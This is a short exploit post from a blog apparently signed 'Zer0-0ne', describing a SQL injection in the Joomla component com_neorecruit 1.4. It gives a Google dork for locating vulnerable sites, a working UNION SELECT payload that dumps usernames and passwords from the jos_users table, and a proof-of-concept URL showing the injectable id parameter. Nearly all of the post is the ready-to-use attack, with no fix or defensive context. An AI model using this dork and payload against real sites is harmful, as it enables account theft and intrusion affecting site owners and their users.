Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability ~ Zer0-0ne

Saturday, August 7, 2010

Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability

Application : NeoRecruit
Version : 1.4 Lower versions may also be affected
Vendor : http://www.neojoomla.com/
Google Dork : inurl:com_neorecruit
-------------------------------------

eXploit:
~~~~~~~

-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users--

Poc:
~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_neorecruit&task=offer_view&id=[SQLi]

Zer0-0ne

Saturday, August 7, 2010

Joomla Component com_neorecruit 1.4 (id) SQL Injection Vulnerability

0 comments:

Post a Comment

About Me

Blog Archive

Popular Posts

Categories

Featured Posts